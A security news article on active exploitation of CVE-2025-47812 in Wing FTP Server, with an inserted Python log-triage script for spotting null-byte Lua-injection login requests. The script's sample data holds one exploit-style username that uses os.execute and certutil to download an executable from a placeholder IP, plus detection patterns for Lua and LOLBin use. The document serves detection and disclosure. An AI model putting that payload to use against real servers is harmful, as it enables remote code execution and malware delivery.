Hackers Exploit Critical RCE Vulnerability in Wing FTP Server

📟 News

Date: 17/07/2025

Hackers began exploiting a critical vulnerability in Wing FTP Server just one day after technical details about the issue were published.

The vulnerability has been assigned the identifier CVE-2025-47812 and has received the maximum score of 10 on the CVSS scale. It involves a combination of a null byte and Lua code injection, allowing an unauthenticated attacker to remotely execute code with the highest privileges (root/SYSTEM).

The details of this issue were published by cybersecurity specialist Julien Ahrens on June 30, 2025. The expert explained that the vulnerability is related to the insecure handling of null-terminated strings in C++ and improper input sanitization in Lua.

Ahrens demonstrated that a null byte in the username field allows bypassing authentication and injecting Lua code into the server's session files. When the server later loads and executes such a session file, the injected code runs with the server's own privileges, i.e. as root/SYSTEM.

In addition to CVE-2025-47812, Ahrens described three more vulnerabilities in Wing FTP Server:

  • CVE-2025-27889 — allows extraction of user passwords via a specially crafted URL if the user fills and submits the login form, due to the inclusion of the password in a JavaScript (location) variable;
  • CVE-2025-47811 — Wing FTP Server runs by default with root/SYSTEM privileges, without sandboxing or privilege reduction, making RCE much more dangerous;
  • CVE-2025-47813 — providing an excessively long UID cookie reveals file system paths.

All vulnerabilities affect Wing FTP Server 7.4.3 and earlier versions. The issues were fixed in version 7.4.4, released on May 14, 2025, with the exception of the CVE-2025-47811 issue, which was deemed insignificant.

Experts from Huntress have developed a PoC exploit for the critical bug CVE-2025-47812 and demonstrated in a video how hackers can use it in attacks.

On July 1, just a day after the technical details of CVE-2025-47812 were published, specialists from Huntress discovered that at least one attacker had already exploited the vulnerability against one of Huntress's customers.

The attackers sent malicious login requests to loginok.html with usernames containing null bytes. These requests caused the server to write attacker-controlled Lua into .lua session files; when those files were executed, the injected code decoded a payload and ran it via cmd.exe, using certutil to download and launch malware.
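The request pattern described above (and the null-byte authentication bypass explained earlier) can be triaged from web or proxy logs. The following is an added example written for this article, not code from Huntress, RCE Security or the Wing FTP project. It models the two facts the write-ups give: authentication compares the username as a NUL-terminated string, so only the bytes before the first null byte decide which account is checked, while the full username bytes are written into a Lua session file. The log line format, the Lua indicator list and the exact bytes of the sample payload (in particular the characters that close the string before the Lua code) are assumptions; the log lines are constructed sample data.

```python
"""Triage login requests for CVE-2025-47812-style null-byte / Lua injection.

Added illustration (assumed log format, constructed sample lines).
"""
import re
from urllib.parse import unquote_to_bytes

LOGIN_ENDPOINT = "/loginok.html"

# Lua primitives that would give code execution once injected text is
# executed from a session file. Assumed indicator list, not vendor-supplied.
LUA_EXEC = re.compile(rb"\b(os\.execute|io\.popen|os\.getenv|loadstring|dofile)\b")
# Living-off-the-land binaries seen in the reported attack (certutil/cmd.exe).
LOLBIN = re.compile(rb"(certutil|cmd\.exe|powershell)", re.IGNORECASE)

# Assumed log format: METHOD PATH CLIENT_IP "RAW_BODY"
LINE_RE = re.compile(r'^(?P<method>\S+) (?P<path>\S+) (?P<ip>\S+) "(?P<body>.*)"$')

# Constructed sample log lines (not real telemetry).
SAMPLE_LOG = [
    # benign login
    'POST /loginok.html 10.0.0.5 "username=alice&password=Hunter2"',
    # null byte (%00) after a valid account name, followed by Lua that
    # runs certutil; the %22 closing the string is an assumed detail
    'POST /loginok.html 203.0.113.7 "username=anonymous%00%22os.execute('
    '%22certutil%20-urlcache%20-f%20http%3A%2F%2F203.0.113.7%2Fa.exe%20a.exe%22)--'
    '&password=x"',
    # null byte but no payload: a probe or a scanner
    'POST /loginok.html 198.51.100.9 "username=test%00&password=p"',
    # null byte on another endpoint is not this CVE's pattern
    'GET /dir.html?x=%00 192.0.2.3 ""',
]


def raw_field(body: str, name: str) -> bytes:
    """Return the percent-decoded bytes of one form field, null bytes included."""
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote_to_bytes(value)
    return b""


def c_string_view(raw: bytes) -> bytes:
    """What a NUL-terminated C/C++ string comparison actually sees."""
    nul = raw.find(b"\x00")
    return raw if nul < 0 else raw[:nul]


def analyse_login(body: str) -> dict:
    """Split the username into the part authentication checks and the
    part that survives into the session file."""
    raw = raw_field(body, "username")
    seen = c_string_view(raw)
    has_nul = len(seen) < len(raw)
    tail = raw[len(seen) + 1:] if has_nul else b""
    return {
        "authenticated_as": seen.decode("latin-1"),
        "has_null_byte": has_nul,
        "lua_exec": bool(LUA_EXEC.search(tail)),
        "lolbin": bool(LOLBIN.search(tail)),
    }


def triage(lines) -> list:
    """Return one alert per POST to the login endpoint whose username
    contains a null byte; 'critical' if Lua execution primitives follow it."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != LOGIN_ENDPOINT:
            continue
        info = analyse_login(m["body"])
        if not info["has_null_byte"]:
            continue
        severity = "critical" if info["lua_exec"] else "suspicious"
        alerts.append({"ip": m["ip"], "severity": severity, **info})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert)
```

Any null byte in a login username is abnormal and worth an alert on its own; the Lua and certutil indicators only raise the severity, since an attacker can choose other Lua functions or other downloaders. Confirm on the host by looking for unexpected .lua session files and child processes of the Wing FTP Server service, and verify the installed version is 7.4.4 or later.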

According to Huntress, Wing FTP Server was attacked from five different IP addresses over a short period of time. This may indicate attempts at mass scanning and exploitation of the vulnerability by multiple hacking groups.

The observed attacks failed, either because the attackers did not know how to use the bug properly or because Microsoft Defender stopped the payload. Nevertheless, the researchers emphasize that CVE-2025-47812 is clearly being exploited in the wild and recommend that users update to version 7.4.4 as soon as possible.
